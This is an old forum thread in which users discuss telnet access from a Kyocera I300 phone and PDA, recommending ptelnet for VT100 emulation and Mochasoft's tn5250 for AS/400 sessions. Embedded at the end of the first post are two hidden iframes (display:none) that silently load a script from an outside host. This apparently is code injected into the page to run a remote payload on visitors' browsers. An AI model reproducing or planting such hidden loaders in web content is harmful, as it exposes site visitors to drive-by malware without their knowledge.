+ Reply to Thread

Question WAP is wack, Can I do this?

I am new to wireless, PDA and to the I300. I was wondering if I could use this phone to access my companys internal network. A simple telnet session is all I would need. Does anyone have any suggestions on how/if this can be acheived, the software/services required etc.? I am also intersted if anyone has seen a SDK for the I300 or managed to devlop custom applications for the device. Thanks in advance.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Try ptelnet

I downloaded ptelnet to my I300 last week. Hadn't tested it until last night, when I opened up a telnet session to my email server's POP3 port. The banner came up perfectly. Of course, I couldn't figure out how to send the CR properly, but that's an operator issue.

Give it a shot. You can find it on most of the palm download sites (palmgear, pdabuzz, etc.)

-Doug

Thanks! What about emulation?

I have installed, but not tried ptelnet. I'm sure it has possibilities. What about emulation? Is there any thing like the Palm OS emulator that works with the I300? I was able to extract a ROM image, but could not use it with the emulator software. Any ideas?

ptelnet does VT100 terminal emulation. I have used it before on my Kyocera 6035, and it worked very well. In to send a carriage return, you send the ENTER key, which is accomplished w/grafitti doing a diagnol stoke, starting in the upper right part of the grafitti area and continuing down to the left, like the slash (/) character.

I have a specialized need to be able to telnet to AS/400s, so I use Mochasoft's tn5250 emulator. It works fantastic, but the funny thing is, it did not work w/my 6035. Mocha makes other emulators for all sorts of platforms. You might want to check out their website at www.mochasoft.dk.

Carl